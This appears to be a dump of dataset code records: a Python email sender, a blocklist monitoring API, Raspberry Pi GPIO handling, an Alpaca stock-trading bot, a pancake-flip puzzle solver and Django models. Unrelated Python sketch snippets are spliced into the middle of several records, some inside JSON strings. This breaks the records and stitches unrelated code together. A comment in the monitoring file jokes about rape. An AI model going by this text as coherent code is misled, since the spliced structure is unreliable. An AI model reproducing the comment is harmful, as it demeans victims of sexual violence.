smtplib.SMTP('smtp.gmail.com:587')\r\n\t\ts.starttls()\r\n\t\ts.login(self.sender,self.senderpass)\r\n\t\ts.sendmail(self.sender, 
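# A minimal, hedged sketch of the Luigi pattern used in tasks.py above,
# where @requires wires one task's output() to the next task's input().
# Assumes the `luigi` package is installed; the task names and file targets
# here are hypothetical.
import luigi
from luigi.util import requires

class MakeUpper(luigi.Task):
    text = luigi.Parameter()

    def output(self):
        return luigi.LocalTarget('upper.txt')

    def run(self):
        with self.output().open('w') as fh:
            fh.write(self.text.upper())

@requires(MakeUpper)  # inherits `text` and makes MakeUpper the dependency
class CountChars(luigi.Task):
    def output(self):
        return luigi.LocalTarget('count.txt')

    def run(self):
        with self.input().open() as src, self.output().open('w') as dst:
            dst.write(str(len(src.read())))

if __name__ == '__main__':
    luigi.build([CountChars(text='hello')], local_scheduler=True)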
self.recipients, msg.as_string())\r\n\t\t#test\r\n\t\t# print msg\r\n\t\ts.quit()\r\n\t\r\n\tdef htmladd(self, html):\r\n\t\tself.htmlbody = self.htmlbody+'

'+html\r\n \r\n\tdef attach(self,msg):\r\n\t\tfor f in self.attachments:\r\n\t\t\r\n\t\t\tctype, encoding = mimetypes.guess_type(f)\r\n\t\t\tif ctype is None or encoding is not None:\r\n\t\t\t\tctype = \"application/octet-stream\"\r\n\t\t\t\t\r\n\t\t\tmaintype, subtype = ctype.split(\"/\", 1)\r\n \r\n \r\n\t\t\tif maintype == \"text\":\r\n\t\t\t\tfp = open(f)\r\n\t\t\t\t# Note: we should handle calculating the charset\r\n\t\t\t\tattachment = MIMEText(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telif maintype == \"image\":\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEImage(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telif maintype == \"audio\":\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEAudio(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telse:\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEBase(maintype, subtype)\r\n\t\t\t\tattachment.set_payload(fp.read())\r\n\t\t\t\tfp.close()\r\n\t\t\t\tencoders.encode_base64(attachment)\r\n\t\t\tattachment.add_header(\"Content-Disposition\", \"attachment\", filename=f)\r\n\t\t\tattachment.add_header('Content-ID', '<{}>'.format(f))\r\n\t\t\tmsg.attach(attachment)\r\n\t\r\n\tdef addattach(self, files):\r\n\t\tself.attachments = self.attachments + files\r\n \r\n \r\n \r\n#example below\r\nif __name__ == '__main__':\t\r\n\t# subject and recipients\r\n\tmymail = Bimail('Sales email ' +datetime.now().strftime('%Y/%m/%d'), ['rsmitra@gmail.com'])\r\n\t#start html body. Here we add a greeting. \r\n\tmymail.htmladd('Good morning, find the daily summary below.')\r\n\t#Further things added to body are separated by a paragraph, so you do not need to worry about newlines for new sentences\r\n\t#here we add a line of text and an html table previously stored in the variable\r\n\tmymail.htmladd('Daily sales')\r\n\t##mymail.htmladd(htmlsalestable)\r\n\t#another table name + table\r\n\tmymail.htmladd('Daily bestsellers')\r\n\t##mymail.htmladd(htmlbestsellertable)\r\n\t# add image chart title\r\n\tmymail.htmladd('Weekly sales chart')\r\n\t#attach image chart\r\n\tmymail.addattach(['/home/pi/Desktop/Python/image.jpg'])\r\n\t#refer to image chart in html\r\n\t#mymail.htmladd('') \r\n\t#attach another file\r\n\tmymail.addattach(['bimail.py'])\r\n\t#send!\r\n\tmymail.send()\r\n\r\n","sub_path":"email/bimail.py","file_name":"bimail.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553270281","text":"from db import dbmon\n\nimport api.restrictions\nimport api.caching\nimport ipaddress\nfrom datetime import datetime\n\n\"\"\"\nThis module provides API for monitoring\nAnd every function must return strictly single scalar value.\nReturn type doesn't matters, but must be serializable.\n\"\"\"\n\n\ndef testConn(**kwargs):\n \"\"\"\n Tests a connection.\n :return:\n \"\"\"\n try:\n dbmon.testDBConn()\n return 0\n except:\n return 1\n\n\ndef getLastExitCode(procname):\n exit_code = dbmon.getLastExitCode(procname)\n if exit_code is None:\n \"\"\"Eleven english gentlemen are raping the german women...\"\"\"\n return 9\n \"\"\"...Two english gentlemen are going away\"\"\"\n return exit_code\n\n\ndef getBlockedIPCount(ipv6=False, **kwargs):\n prefixes = map(ipaddress.ip_network,\n api.caching.getDataCached(\n api.restrictions.getBlockedPrefixes,\n collapse=False,\n ipv6=ipv6,\n **kwargs)\n )\n return sum(map(lambda x: x.num_addresses, prefixes))\n\n\ndef getBlockedSubnetsCount(collapse=False, ipv6=False, 
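# A hedged sketch isolating the MIME-type dispatch that Bimail.attach()
# above performs before choosing MIMEText/MIMEImage/MIMEAudio/MIMEBase.
# The file names below are hypothetical.
import mimetypes

for fname in ('report.txt', 'chart.jpg', 'song.mp3', 'blob.bin'):
    ctype, encoding = mimetypes.guess_type(fname)
    if ctype is None or encoding is not None:
        # fall back to a generic binary payload, as attach() does
        ctype = 'application/octet-stream'
    maintype, subtype = ctype.split('/', 1)
    print(fname, '->', maintype, subtype)
# expected: text/plain, image/jpeg, audio/mpeg, application/octet-stream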
**kwargs):\n prefixes = api.caching.getDataCached(\n api.restrictions.getBlockedPrefixes,\n collapse=collapse,\n ipv6=ipv6,\n **kwargs)\n return len(prefixes)\n\n\ndef getBlockedDNSCount(collapse=False, **kwargs):\n domains = api.caching.getDataCached(\n api.restrictions.getBlockedDNS,\n collapse=collapse,\n **kwargs)\n return len(domains)\n\n\ndef getBlockedWildcardDNSCount(collapse=False, **kwargs):\n wdomains = api.caching.getDataCached(\n api.restrictions.getBlockedWildcardDNS,\n collapse=collapse,\n **kwargs)\n return len(wdomains)\n\n\ndef getBlockedURLsCount(**kwargs):\n # It could be done with count() SQL,\n # but cache reuse is preferred.\n urls = api.caching.getDataCached(\n api.restrictions.getBlockedURLs,\n cutproto=True,\n **kwargs)\n return len(urls)\n\n\ndef getDumpLag():\n \"\"\"\n :return: Dump lag in seconds\n \"\"\"\n last = dbmon.getLastDumpTime()\n if last is None:\n return -1\n return round((datetime.now().astimezone() - last).total_seconds())\n\n\ndef getDumpCheckLag():\n \"\"\"\n :return: Parse lag in seconds\n \"\"\"\n last = dbmon.getLastCheckTime()\n if last is None:\n return -1\n return round((datetime.now().astimezone() - last).total_seconds())\n\n\ndef getLastDumpTS():\n \"\"\"\n :return: Dump unix timestamp in seconds\n \"\"\"\n last = dbmon.getLastDumpTime()\n if last is None:\n return -1\n return round(last.timestamp())","sub_path":"rkn/api/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"627088628","text":"import asyncio\nimport enum\nimport logging\n\nfrom RPi import GPIO\n\nfrom bermudafunk import base\nfrom bermudafunk.base import loop\n\nlogger = logging.getLogger(__name__)\n\n_initialized = None\n\n_buttons = {}\n_leds = {}\n\n_used_pins = {}\n\n_pin_events = asyncio.Queue(loop=base.loop)\n\n\nclass LedState(enum.Enum):\n OFF = 'off'\n ON = 'on'\n BLINK = 'blink'\n\n\nclass DummyLed:\n def __init__(self) -> None:\n self._state = LedState.OFF\n self._blink_freq = 2\n\n @property\n def blink_freq(self) -> float:\n return self._blink_freq\n\n @blink_freq.setter\n def blink_freq(self, new_freq: float):\n assert new_freq > 0\n self._blink_freq = new_freq\n\n @property\n def state(self) -> LedState:\n return self._state\n\n @state.setter\n def state(self, new_val: LedState):\n self._state = new_val\n\n\nclass Led(DummyLed):\n def __init__(self, pin):\n super().__init__()\n global _leds\n _leds[str(pin)] = self\n\n self._pin = int(pin)\n\n self._blink_task = None\n\n _setup()\n _check_pin(self._pin, 'led')\n GPIO.setup(self._pin, GPIO.OUT)\n GPIO.output(self._pin, GPIO.LOW)\n\n def __del__(self):\n if self._blink_task is not None:\n self._blink_task.cancel()\n GPIO.output(self._pin, GPIO.LOW)\n\n @property\n def state(self) -> LedState:\n return self._state\n\n @state.setter\n def state(self, new_state: LedState):\n if self._state == new_state:\n return # Same state, nothing to change\n\n self._state = new_state\n\n if self._blink_task is not None:\n self._blink_task.cancel()\n self._blink_task = None\n\n if new_state is LedState.ON:\n GPIO.output(self._pin, GPIO.HIGH)\n elif new_state is LedState.OFF:\n GPIO.output(self._pin, GPIO.LOW)\n elif new_state is LedState.BLINK:\n self._blink_task = loop.create_task(self._blink())\n\n async def _blink(self):\n while True:\n GPIO.output(self._pin, GPIO.HIGH)\n await asyncio.sleep(1 / self._blink_freq)\n GPIO.output(self._pin, GPIO.LOW)\n await asyncio.sleep(1 / 
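# A hedged sketch of the address arithmetic behind getBlockedIPCount()
# above, which sums num_addresses over the blocked prefixes. The prefixes
# below are made up.
import ipaddress

prefixes = [ipaddress.ip_network(p) for p in ('10.0.0.0/24', '192.168.1.0/30')]
print(sum(p.num_addresses for p in prefixes))  # 256 + 4 = 260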
self._blink_freq)\n\n\ndef _setup():\n global _initialized\n if not isinstance(_initialized, asyncio.Task) or _initialized.cancelled():\n logger.debug('setup')\n logger.debug('setup GPIO.setmode')\n GPIO.setmode(GPIO.BOARD)\n logger.debug('setup create process_event loop task')\n _initialized = loop.create_task(_process_event())\n logger.debug('setup create cleanup task')\n base.cleanup_tasks.append(loop.create_task(_cleanup()))\n\n\ndef _check_pin(pin, usage):\n global _used_pins\n pin = int(pin)\n if pin not in _used_pins:\n _used_pins[pin] = usage\n if pin in _used_pins and _used_pins[pin] == usage:\n return True\n raise Exception('pin %s already used as %s instead of %s' % (pin, _used_pins[pin], usage))\n\n\nasync def _cleanup():\n logger.debug('cleanup awaiting')\n await base.cleanup_event.wait()\n logger.debug('cleanup cancel process_event')\n _initialized.cancel()\n for _, led in _leds.items():\n led.state = LedState.OFF\n logger.debug('cleanup reset GPIO')\n GPIO.cleanup()\n\n\ndef register_button(pin, callback=None, coroutine=None, override=False, **kwargs):\n global _buttons\n _setup()\n pin = int(pin)\n if not override and pin in _buttons:\n logger.debug('register_button override not forced so do not override')\n return False\n logger.debug('register_button %s', pin)\n _check_pin(pin, 'button')\n GPIO.setup(pin, GPIO.IN, **kwargs)\n GPIO.add_event_detect(pin, GPIO.RISING, callback=_callback, bouncetime=300)\n _buttons[str(pin)] = {'pin': pin, 'callback': callback, 'coroutine': coroutine}\n\n\ndef remove_button(pin):\n global _buttons\n GPIO.remove_event_detect(pin)\n del _buttons[str(pin)]\n\n\nasync def _process_event():\n global _buttons\n while True:\n pin = await _pin_events.get()\n something_executed = False\n if pin in _buttons:\n if _buttons[pin]['callback'] is not None:\n logger.debug('callback will be called soon')\n loop.call_soon(_buttons[pin]['callback'], int(pin))\n something_executed = True\n if _buttons[pin]['coroutine'] is not None:\n logger.debug('coroutine scheduled as a task')\n loop.create_task(_buttons[pin]['coroutine'](int(pin)))\n something_executed = True\n if not something_executed:\n logger.debug('No callback & no coroutine defined')\n\n\ndef _callback(pin):\n logger.debug('Button press detected; put pin in queue %s' % (pin,))\n loop.call_soon_threadsafe(asyncio.ensure_future, _pin_events.put(str(pin)))\n","sub_path":"bermudafunk/GPIO.py","file_name":"GPIO.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"639210659","text":"'''\n\n############### Read Me ###############\n \n### Name of strategy: Robot Aiur 1.33\n\nAiur 1.33 = Aiur 1.32 + logs are saved to a file\n\n\n### Robot Aiur 1.00 (recap)\n\nEntry rules:\n- Long TSLA if it rises more than 5% in the last 5 days.\n- Short TSLA if it falls more than 5% in the last 5 days.\n\nExit rules:\n- Take profit of 10%\n- Stop loss of 5%\n\nSizing:\n- 1 share per trade.\n- We only hold 1 trade at a time.\n\nAssumptions:\n- We assume that, before we launch this robot, we are not currently not holding a position on TSLA that was entered by Aiur 1.00 \n \nMade by the guys at AlgoTrading101.com\n\n'''\n\n# Docs: https://github.com/alpacahq/alpaca-trade-api-python/tree/cd22b3393aff8df214d867b6a4723a21ea34a3c0\n\n############### Admin Section ###############\n\nimport alpaca_trade_api as tradeapi\nimport time, logging, os\n\n\n### Step 1: Authentication and connection details\n\napi_key = os.environ.get('my_api_key') # 
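# A hedged, hardware-free sketch of the Led._blink() loop above, which
# toggles a pin from an asyncio task at blink_freq Hz. print() stands in
# for GPIO.output() so the snippet runs anywhere.
import asyncio

async def blink(freq: float, cycles: int) -> None:
    for _ in range(cycles):
        print('ON')                    # GPIO.output(pin, GPIO.HIGH) in the original
        await asyncio.sleep(1 / freq)
        print('OFF')                   # GPIO.output(pin, GPIO.LOW) in the original
        await asyncio.sleep(1 / freq)

asyncio.run(blink(freq=2, cycles=3))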
Alpaca API key\napi_secret = os.environ.get('my_api_secret') # Alpaca API Secret\nbase_url = os.environ.get('my_base_url') # Alpaca's base URL\nticker = os.environ.get('ticker_to_trade') # The asset we are trading\ncurrent_order_id = int(os.environ.get('order_id')) # Our order id number. Change this if this order id has already been taken\nlong_percent_change = float(os.environ.get('entry_long_percent_change')) # Percent change of ticker to initate long entry trade\nshort_percent_change = float(os.environ.get('entry_short_percent_change')) # Percent change of ticker to initate short entry trade\nlogname = os.environ.get('my_log_name') # Name of the saved log file\n\n### Step 2: Instantiate REST API \n\napi = tradeapi.REST(api_key, api_secret, base_url, api_version='v2')\n\n### Step 3: Create basic logging configuration \n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n## Set logger for saving logs\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(levelname)s: %(message)s', filename=logname, filemode='a')\n\n## Set a logger for displaying logs\n# Define a Handler which writes messages\nconsole = logging.StreamHandler()\n# Write messages of priority INFO or higher\nconsole.setLevel(logging.INFO)\n# Set a format which is simpler for console use\nformatter = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')\n# Tell the handler to use this format\nconsole.setFormatter(formatter)\n# Add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\n\n### Step 4: Set up variables for later use\n\ntake_profit_percent = 10 # E.g. 2 means 2% take profit\nstop_loss_percent = 5 # E.g. 2 means 2% stop loss\n\nin_long_position = False # We assume we are not in a long position when we start the algo. This should always be false.\nin_short_position = False # We assume we are not in a short position when we start the algo. This should always be false.\n\ntake_profit_level = None\nstop_loss_level = None\n\nrisk_per_trade = 1 # How much of your equity to risk per trade\n\nmax_position_size_per_order = 5 # (#component1)\nmax_total_position_size = 50 # (#component2)\nmax_num_orders_day = 2 # (#component3)\n\norder_tracker = []\n\n\n############### Functions Section ###############\n\ndef check_risk_mgmt(ticker, direction, share_quantity, max_position_size_per_order, max_total_position_size):\n \n original_share_quantity = share_quantity\n \n # Limit order size to specified value. 
(#component1)\n if share_quantity > max_position_size_per_order:\n share_quantity = max_position_size_per_order \n logging.warning(f'Order size limit of {max_position_size_per_order} reached.')\n logging.warning(f'Order size reduced from {original_share_quantity} to {share_quantity}.')\n \n # Limit total position we can hold for our ticker (#component2)\n try:\n current_pos = int(api.get_position(ticker).qty)\n except Exception as e:\n if str(e) == 'position does not exist':\n current_pos = 0\n\n if direction == 'sell':\n attempted_order_size = -share_quantity \n else:\n attempted_order_size = share_quantity\n\n if abs(current_pos + attempted_order_size) > max_total_position_size:\n share_quantity = max(max_total_position_size - abs(current_pos), 0) \n logging.warning(f'Maximum {ticker} position of {max_total_position_size} reached.')\n logging.warning(f'Order size reduced from {original_share_quantity} to {share_quantity}.')\n\n return share_quantity\n\n\ndef number_of_orders_today(order_tracker, today_date):\n\n # Check total number of orders today\n\n num_positions = []\n for stamp in order_tracker:\n if stamp == today_date:\n num_positions.append(True)\n \n logging.info(f'We have entered {len(num_positions)} orders today')\n \n return len(num_positions)\n \n\ndef fire_trade(ticker, direction, share_quantity, current_order_id, max_position_size_per_order, max_total_position_size): \n # Fires a trade (can be an entry or exit). All trades fired are market orders.\n \n share_quantity = check_risk_mgmt(ticker, direction, share_quantity, max_position_size_per_order, max_total_position_size)\n \n if share_quantity > 0:\n \n order_info = api.submit_order(\n symbol=ticker,\n qty=share_quantity,\n side=direction,\n time_in_force='gtc',\n type='market',\n client_order_id='Aiur_' + str(current_order_id),\n )\n \n if order_info.status == 'accepted':\n \n time.sleep(3) # Give it a few seconds to process the order...\n \n order_info_status = api.get_order_by_client_order_id('Aiur_' + str(current_order_id)).status\n \n filled_price = api.get_order_by_client_order_id('Aiur_' + str(current_order_id)).filled_avg_price\n \n logging.info(f'Order status for {direction} trade: {order_info_status}')\n logging.info(f'{direction} order price: {filled_price}')\n \n return order_info_status, float(filled_price), share_quantity\n \n else:\n \n logging.warning(f'Order for {direction} trade NOT filled. Status: {order_info.status}')\n \n return order_info.status, None, 0\n \n else:\n\n return 'Did not fire order', None, 0\n\ndef fire_entry_trade(ticker, direction, tp_percent, sl_percent, current_price, risk_per_trade, current_order_id, max_position_size_per_order, max_total_position_size): \n # All trades fired are market orders. Includes take-profit and stop-loss \n # Calculate amount of shares to buy \n\n # Calculate take-profit and stop-loss\n if direction == 'buy':\n take_profit_level = round(current_price * (1 + tp_percent / 100), 2) # Calculate take profit level. Round to 2 decimal places\n stop_loss_level = round(current_price * (1 - sl_percent / 100), 2) # Calculate stop loss level. Round to 2 decimal places\n\n # Set take-profit and stop-loss\n elif direction == 'sell':\n take_profit_level = round(current_price * (1 - tp_percent / 100),2) # Calculate take profit level. Round to 2 decimal places\n stop_loss_level = round(current_price * (1 + sl_percent / 100),2) # Calculate stop loss level. 
Round to 2 decimal places\n\n\n # Calculate position size\n share_quantity = calc_shares(current_price, stop_loss_level, risk_per_trade) \n \n if share_quantity > 0:\n\n # Check if entry is allowed\n if entry_allowed(ticker, share_quantity, current_price): # Aiur 1.2 addition\n\n order_status_new_trade, filled_price, share_quantity_traded = fire_trade(ticker, direction, share_quantity, current_order_id, max_position_size_per_order, max_total_position_size) # Fire a trade\n\n if order_status_new_trade == 'filled':\n logging.info(f'{direction} entry TP price: {take_profit_level}')\n logging.info(f'{direction} entry SL price: {stop_loss_level}')\n\n return order_status_new_trade, filled_price, take_profit_level, stop_loss_level, share_quantity_traded\n\n else:\n \n return 'Did not fire order', None, None, None, 0\n \n else:\n \n return 'Did not fire order', None, None, None, 0\n \ndef entry_allowed(ticker, share_quantity, current_price): \n # Check to see if we can't open an entry order due to PDT rule or lack of buying power\n \n # Check to see account is blocked\n account = api.get_account()\n \n if account.pattern_day_trader:\n logging.warning('Account is blocked due to PDT rule. No new entry orders can be fired.')\n return False\n\n # Check to see if we have enough buying power to execute a trade \n if float(account.buying_power) < share_quantity * current_price:\n logging.warning(f'Not enough buying power for a entry trade of {share_quantity} shares of {ticker}.')\n return False\n \n return True # Returns True is entry orders are allowed, False otherwise.\n \ndef wait_for_market_open(): \n # Check to see if the market is open - wait for open if it is not\n \n clock = api.get_clock()\n if not clock.is_open:\n time_to_open = (clock.next_open - clock.timestamp).total_seconds()\n logging.warning(f'Market is not open, going to sleep for {time_to_open:.2f} seconds')\n time.sleep(time_to_open)\n \n\ndef calc_shares(entry_price, stop_price, risk_percent): \n # Calculate amount of shares to buy \n\n account_balances = api.get_account()\n equity = float(account_balances.equity)\n risk_amount = equity * risk_percent / 100 \n risk_per_share = abs(entry_price - stop_price)\n\n return round(risk_amount / risk_per_share)\n\n############### Strategy Section ###############\n \n# Check to see if our asset is tradable before starting main strategy loop \n\nassets = api.list_assets(status='active')\nactive_assets = [i.symbol for i in assets]\nif ticker not in active_assets:\n logging.error(f'{ticker} is not tradable - halting strategy')\n quit(0)\n\nwhile True:\n\n logging.info('--------- Start of current 10 second period ---------')\n\n\n ### Step 1: Check to see if the market is open - wait for open if it is not \n\n wait_for_market_open() \n\n ### Step 2: Get data and calculate required variables\n \n barset = api.get_barset(ticker, 'day', limit=10) # Get daily price data for TSLA over the last 10 trading days.\n tsla_bars = barset.df[ticker] # Isolate just the bar data for TSLA\n\n today_close = tsla_bars.close[-1] \n current_price = today_close # To reduce confusion since today's closing price = current price if today's market session has not ended.\n five_days_ago_close = tsla_bars.close[-6]\n percent_change = ((today_close - five_days_ago_close) / five_days_ago_close * 100) # Percentage change over the last 5 days\n\n logging.info(f'{ticker} moved {percent_change:.2f}% over the last 5 days') \n\n today_date = tsla_bars.index[-1].date() \n\n order_status = None # Reset order status\n 
order_filled_price = None # Reset order filled price\n\n ### Step 3: Check to see account is blocked\n account = api.get_account()\n\n if any([account.account_blocked, account.trading_blocked]):\n logging.warning('Account is blocked - exiting.. ')\n quit(0)\n\n ### Step 4: Check for exit signal and close our trades if there are exit signals\n \n if in_long_position:\n # We are in a long position - Check for exit\n \n if today_close > take_profit_level or today_close < stop_loss_level: # Check if prices crosses take-profit or stop-loss levels\n order_status, filled_price, share_quantity_exited = fire_trade(ticker, 'sell', share_quantity_entered, current_order_id, max_position_size_per_order, max_total_position_size)\n if order_status == 'filled':\n in_long_position = False\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We exited our LONG trade of {share_quantity_exited} shares at exit price: {filled_price}!')\n\n elif in_short_position:\n # We are in a short position - Check for exit\n \n if today_close < take_profit_level or today_close > stop_loss_level: # Check if prices crosses take-profit or stop-loss levels\n order_status, filled_price, share_quantity_exited = fire_trade(ticker, 'buy', share_quantity_entered, current_order_id, max_position_size_per_order, max_total_position_size)\n if order_status == 'filled':\n in_short_position = False\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We exited our SHORT trade of {share_quantity_exited} shares at exit price: {filled_price}!')\n \n \n ### Step 5: Check for entry signal and enter a new trades if there are entry signals\n \n elif not in_long_position and not in_short_position: \n # We are not in a position - Look for an entry\n # Insert long entry rule here\n if percent_change > long_percent_change:\n # Long trade signal\n\n # (#component3) \n if number_of_orders_today(order_tracker, today_date) < max_num_orders_day:\n \n order_status, filled_price, take_profit_level, stop_loss_level, share_quantity_entered = fire_entry_trade(ticker,\n 'buy', \n take_profit_percent, \n stop_loss_percent, \n current_price, \n risk_per_trade,\n current_order_id,\n max_position_size_per_order, \n max_total_position_size)\n\n if order_status == 'filled':\n in_long_position = True\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We entered a LONG trade of {share_quantity_entered} shares at entry price: {filled_price}!')\n\n order_tracker.append(today_date)\n \n else:\n \n logging.warning(f'Maximum number of orders per day of {max_num_orders_day} is reached.')\n logging.warning(f'Long entry signal triggered but entry order NOT fired.')\n\n # Insert short entry rule here\n elif percent_change < short_percent_change:\n # Short trade signal\n\n # (#component3)\n if number_of_orders_today(order_tracker, today_date) < max_num_orders_day:\n\n order_status, filled_price, take_profit_level, stop_loss_level, share_quantity_entered = fire_entry_trade(ticker,\n 'sell', \n take_profit_percent, \n stop_loss_percent, \n current_price, \n risk_per_trade,\n current_order_id,\n max_position_size_per_order, \n max_total_position_size)\n if order_status == 'filled':\n in_short_position = True\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We entered a SHORT trade of {share_quantity_entered} shares at entry price: {filled_price}!')\n\n order_tracker.append(today_date)\n \n else:\n \n logging.warning(f'Maximum number of orders per day of {max_num_orders_day} is reached.')\n 
logging.warning(f'Short entry signal triggered but entry order NOT fired.')\n \n \n ### Step 6: Rest for a few seconds before running the Strategy Section again on new price updates\n\n # Get current positions\n try:\n total_positions_ticker = int(api.get_position(ticker).qty)\n except Exception as e:\n if str(e) == 'position does not exist':\n total_positions_ticker = 0\n \n account = api.get_account()\n\n logging.info(f'{ticker}\\'s current price is {today_close}')\n logging.info(f'We currently hold {total_positions_ticker} shares of {ticker}')\n logging.info(f'Our account equity is ${account.equity}')\n logging.info(f'Our account buying power is ${account.regt_buying_power}')\n logging.info('--------- End of current 10 second period ---------')\n time.sleep(10) # Rest for 10 seconds\n","sub_path":"Alpaca-AlgoTrading101-Chapter-10/Robot-Aiur-1.33.py","file_name":"Robot-Aiur-1.33.py","file_ext":"py","file_size_in_byte":17687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308521614","text":"\ndef total_flipping_count(stack):\n\tflip_count = 0\n\tcal_stack = stack\n\twhile(True):\n\t\tif all_happy_side(cal_stack):\n\t\t\treturn flip_count\n\t\telse:\n\t\t\tcal_stack = flip_pancakes(cal_stack)\t\n\t\tflip_count += 1\n\n\ndef all_happy_side(stack):\n\tfor c in stack:\n\t\tif c is \"-\":\n\t\t\treturn False\n\treturn True\n\n\ndef flip_pancakes(stack):\n\tpart_stack = []\n\tpos = 0\n\tfor cake in stack:\n\t\tif pos > 0 and part_stack[pos-1] is not cake:\n\t\t\treturn flipping(stack, part_stack)\n\t\telse:\n\t\t\tpart_stack.append(cake)\n\t\tpos += 1\t\n\n\treturn flipping(stack, part_stack)\n\t\n\ndef flipping(stack, part_stack):\n\ttemp_stack = []\n\tfor c in part_stack:\n\t\ttemp_stack.append(\"-\" if c is \"+\" else \"+\")\n\ttemp_stack.reverse()\t\n\treturn temp_stack + stack[len(temp_stack):len(stack)]\n\n\nt = int(input())\nfor i in range(1, t + 1):\n\tpancake_stack = [c for c in input()]\n\tprint(\"Case #{}: {}\".format(i, total_flipping_count(pancake_stack)))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_bono83_B-large.py","file_name":"16_0_2_bono83_B-large.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108495396","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass SpectacleManager(models.Manager):\n def get_related_object(self, spectacle):\n if not spectacle:\n return self\n else:\n if spectacle.spectacle_type == 'FILME':\n return spectacle.movie_set.first()\n elif spectacle.spectacle_type == 'SHOW':\n return spectacle.show_set.first()\n elif spectacle.spectacle_type == 'PECA':\n return spectacle.play_set.first()\n\n def get_parent_object(self, spectacle):\n if not spectacle:\n return self\n else:\n return Spectacle.objects.get(\n id=spectacle.spectacle_id\n )\n\n\nclass SpectacleComponent(models.Model):\n class Meta:\n abstract = True\n\n PREESTREIA = 'PREESTREIA'\n EMCARTAZ = 'EMCARTAZ'\n LANCAMENTO = 'LANCAMENTO'\n FORACARTAZ = 'FORACARTAZ'\n EMBREVE = 'EMBREVE'\n\n LIVRE = 'LIVRE'\n DEZANOS = '10ANOS'\n DOZEANOS = '12ANOS'\n QUATORZEANOS = '14ANOS'\n DEZESSEISANOS = '16ANOS'\n MAIORESDEDEZOITO = 'MAIORES18'\n\n FILME = 'FILME'\n SHOW = 'SHOW'\n PECA ='PECA'\n NA = 'NA'\n\n STATUS_CHOICES = (\n (PREESTREIA, 'Pré-Estréia'),\n (EMCARTAZ, 'Em Cartaz'),\n (LANCAMENTO, 'Lançamento'),\n (FORACARTAZ, 'Fora de Cartaz'),\n (EMBREVE, 'Em 
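# A hedged worked example of calc_shares() above, which sizes a trade as
# (equity * risk_percent / 100) / |entry - stop|. All numbers are made up
# for illustration.
equity = 100_000.0
risk_percent = 1                                 # risk 1% of equity per trade
entry_price, stop_price = 250.0, 237.5           # stop 5% below entry

risk_amount = equity * risk_percent / 100        # 1000.0 at risk
risk_per_share = abs(entry_price - stop_price)   # 12.5 per share
print(round(risk_amount / risk_per_share))       # 80 shares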
Breve'),\n )\n\n CLASSIFICATION_CHOICES = (\n (LIVRE, 'Livre'),\n (DEZANOS, '10 Anos'),\n (DOZEANOS, '12 Anos'),\n (QUATORZEANOS, '14 Anos'),\n (DEZESSEISANOS, '16 Anos'),\n (MAIORESDEDEZOITO, 'Maiores de 18 Anos'),\n )\n\n SPECTACLE_CHOICES = (\n (FILME, 'Filme'),\n (SHOW, 'Show'),\n (PECA, 'Peça Teatral'),\n (NA, 'N/A'),\n )\n\n name = models.CharField(\n verbose_name=_('Nome'),\n help_text=_('Nome da Espetáculo'),\n max_length=100,\n default=\"\",\n )\n\n status = models.CharField(\n verbose_name=_('Status do Espetáculo'),\n help_text=_('Status do Espetáculo'),\n max_length=15,\n choices=STATUS_CHOICES,\n default=EMBREVE\n )\n\n poster = models.ImageField(\n upload_to='media/',\n help_text=_(\"Poster do Espetáculo\"),\n verbose_name=_('Poster'),\n blank=True,\n null=True,\n max_length=500\n )\n\n duration = models.PositiveIntegerField(\n verbose_name=_('Duração'),\n help_text=_('Duração do Espetáculo em minutos'),\n default=0\n )\n\n classification = models.CharField(\n verbose_name=_('Classificação Indicativa'),\n help_text=_('Classificação Indicativa do Espetáculo'),\n max_length=20,\n choices=CLASSIFICATION_CHOICES,\n default=LIVRE\n )\n\n spectacle_type = models.CharField(\n verbose_name=_('Tipo do Espetáculo'),\n help_text=_('Tipo do Espetáculo'),\n max_length=15,\n choices=SPECTACLE_CHOICES,\n default=NA\n )\n\n objects = SpectacleManager()\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('spectacle:spectacle-detail', kwargs={'id': self.id})\n\n\nclass Spectacle(SpectacleComponent):\n class Meta:\n verbose_name = _(\"Espetáculo\")\n verbose_name_plural = _(\"Espetáculos\")\n\n\nclass SpectacleDecorator(SpectacleComponent):\n class Meta:\n abstract = True\n\n spectacle = models.ForeignKey(\n Spectacle,\n on_delete=models.PROTECT\n )\n\n\nclass Movie(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Filme\")\n verbose_name_plural = _(\"Filmes\")\n\n ANIMACAO = 'ANIMACAO'\n ACAO = 'ACAO'\n BIOGRAFIA = 'BIOGRAFIA'\n COMEDIA = 'COMEDIA'\n DOCUMENTARIO = 'DOCUMENTARIO'\n DRAMA = 'DRAMA'\n FICCAO = 'FICCAO'\n MUSICAL = 'MUSICAL'\n ROMANCE = 